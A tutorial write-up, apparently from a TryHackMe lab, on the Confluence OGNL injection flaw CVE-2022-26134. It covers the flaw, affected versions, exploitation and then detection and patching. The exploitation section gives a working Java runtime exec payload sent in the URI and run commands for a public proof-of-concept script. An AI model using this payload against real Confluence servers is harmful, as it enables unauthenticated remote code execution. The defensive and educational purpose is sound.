This article dives into the heart of CVE-2022–26134 and was written strictly for educational purposes. I would like to thank TryHackMe and cmnatic for creating the instance that allowed me to discover and exploit this vulnerability. All the content of this article is a condensation of several sources that also allowed me to deepen my knowledge about this vulnerability.
Summary
- What is Atlassian Confluence ?
- NIST Report
- Explaining CVE-2022–26134
- Practical Exploitation
- Exploit Detection & Patching
- Resources
What is Atlassian Confluence ?
According to Atlassian, Confluence is a workspace for sharing knowledge or collaborating on team projects. There are dynamic pages that gives your team a place to create, capture and collaborate on different projects or ideas. With the spaces, we can structure, organize and share tasks, so that each member has visibility into institutional knowledge as well as access to the information needed to optimize his work.
In short, Confluence is a collaborative documentation and project management framework for teams. Confluence helps track project status by offering a centralised workspace for members.
On May the 30th, 2022, a company named Volexity identified an un-authenticated RCE vulnerability (scoring 9.8 on NIST) within Atlassian’s Confluence Server and Data Center editions.
NIST Report
In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance.
The affected versions are :
• 1.3.0 -> 7.4.17
• 7.13.0 -> 7.13.7
• 7.14.0 -> 7.14.3
• 7.15.0 -> 7.15.2
• 7.16.0 -> 7.16.4
• 7.17.0 -> 7.17.4
• 7.18.0 -> 7.18.1
Explaining CVE-2022–26134
Object-Graph Navigation Language & OGNL Injections
Object-Graph Navigation Language is an open-source expression language for Java that, while using simpler expressions than the full range of those supported by the Java language, allows you to obtain and define properties and execute methods of Java classes. Briefly OGNL is used for getting and setting properties of Java objects.
For example, OGNL is used to bind front-end elements such as text boxes to back-end objects and can be used in Java-based web applications such as Confluence. We can see how OGNL is used in the screenshot below. Values are input to a web form, where these values will be stored into objects within the application.
OGNL Injection occurs when the Expression Language (EL) interpreter attempts to interpret user-supplied data without validation enabling attackers to inject their own EL code. And that’s the point of this vulnerability, we can abuse the fact that OGNL can be modified.
Practical Exploitation
Exploitation with curl
In order to exploit this vulnerability within OGNL, we need to make an HTTP GET request and place our payload within the URI. For example, we can instruct the Java runtime to execute a command such as creating a file on the server :
${@java.lang.Runtime@getRuntime().exec("touch /tmp/evilfile/")}/
This will need to be URL encoded, like the following snippet below (note that your curl
payload will need to end in a trailing /
and not $2F
):
According to the fact that the server didn’t threw us any error code, we could think that the server accepted our request. So, let’s try this exploit made by Nwqda to check if everything is working properly and that the server is vulnerable.
Exploitation with PoC by Nwqda
- Clone the repository :
git clone https://github.com/Nwqda/CVE-2022-26134
cd CVE-2022-26134
- Then you can run the exploit with the command of your choice as follow:
python3 cve-2022-26134.py https://target.com CMD
python3 cve-2022-26134.py https://target.com id
python3 cve-2022-26134.py https://target.com "ps aux"
Here we are, we can now launch commands on the server…
So, let’s jump into the Blue Team part.
Exploit Detection and Patching
Detection : Log Files
Confluence is an Apache Tomcat server which has logging located in/opt/atlassian/confluence/logs
. You can use commands like grep to search for HTTP GET requests of payloads that are using Java runtime to execute commands.
For example:grep -R "/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22"
in catalina.out.
Detection : Yara
If you have Yara installed on the server running Confluence, Volexity (the finders of the vulnerability) has created the following Yara rule :
Patching
Atlassian has released an advisory for their products affected by this CVE, which you can read here. To resolve the issue, you need to upgrade your Confluence version. The suggested list at the time of publication is:
• 7.4.17
• 7.13.7
• 7.14.3
• 7.15.2
• 7.16.4
• 7.17.4
• 7.18.1